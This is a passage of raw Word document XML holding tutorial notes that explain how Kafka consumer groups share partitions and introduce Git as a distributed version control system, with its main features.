          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">However, within a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, each partition can only be consumed by one consumer at a time. If there are more consumers in a consumer group than partitions, the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>extra consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will remain idle, as there are no more partitions to consume from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34651DDE" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637AE75" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you have 3 partitions and 5 consumer groups:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C8C0E" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each of the 5 consumer groups will receive the data from the 3 partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6505CED9" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Each partition can be consumed by only one consumer per consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD4BE7" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Since the number of consumer groups exceeds the number of partitions, the extra consumer groups will not have any impact on partition consumption but will consume the same messages independently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B59412" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE1E06" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multiple consumer groups</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can consume independently from the same partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2C1D0" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More consumers in a group than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some consumers will be idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31624FA9" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="004269A3" w:rsidRDefault="00CA2729" w:rsidP="004269A3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>More consumer groups than partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each group consumes independently from the partitions, and no data loss happens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104A2C31" w14:textId="7FF8415A" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CA2729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="3F91DAB4">
          <v:rect id="_x0000_i3336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4746444F" w14:textId="797B7526" w:rsidR="00D70F52" w:rsidRPr="00CE4B95" w:rsidRDefault="00D70F52" w:rsidP="00D70F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="825" w:name="_Toc196308305"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>GitHub</w:t>
      </w:r>
      <w:bookmarkEnd w:id="825"/>
    </w:p>
    <w:p w14:paraId="7330F874" w14:textId="77777777" w:rsidR="00AE3A76" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE3A76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="826" w:name="_Toc196308306"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Version control i.e. Git?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="826"/>
    </w:p>
    <w:p w14:paraId="15EF722A" w14:textId="66F6A39A" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Version control, also known as source control, is a system that helps developers manage changes to code over time. Git is one of the most popular distributed version control systems. It tracks changes to files, enabling multiple developers to collaborate on the same project without overwriting each other's work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB6883" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s a breakdown of </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and its significance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E5265B" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is Git?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FD56D1" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Git is a distributed version control system that allows you to track changes to files and coordinate work on those files among multiple people. It was created by </w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linus Torvalds</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in 2005 for managing the Linux kernel's development. Git is fast, efficient, and widely used in the software development industry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF836A9" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Features of Git:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4355EE14" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tracking Changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git keeps track of every change made to files in the repository, along with information about who made the change and when.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529B4969" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Every contributor gets a full copy of the repository, including its history. This allows them to work offline and push changes when they are online.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5C1A50" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Branching and Merging</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git allows for branching (creating separate lines of development) and merging (combining them). This helps developers experiment with new features without affecting the main codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6A2862" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Commit History</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git stores a history of all the commits made to the repository. You can always check the history and revert to a previous state if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459C0FB8" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Collaboration</w:t>
      </w:r>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git allows multiple developers to work on the same project simultaneously. It efficiently manages changes, even when multiple people modify the same file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F13D0B3" w14:textId="77777777" w:rsidR="00CA2729" w:rsidRPr="00324FFB" w:rsidRDefault="00CA2729" w:rsidP="00324FFB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324FFB">
        <w:rPr>
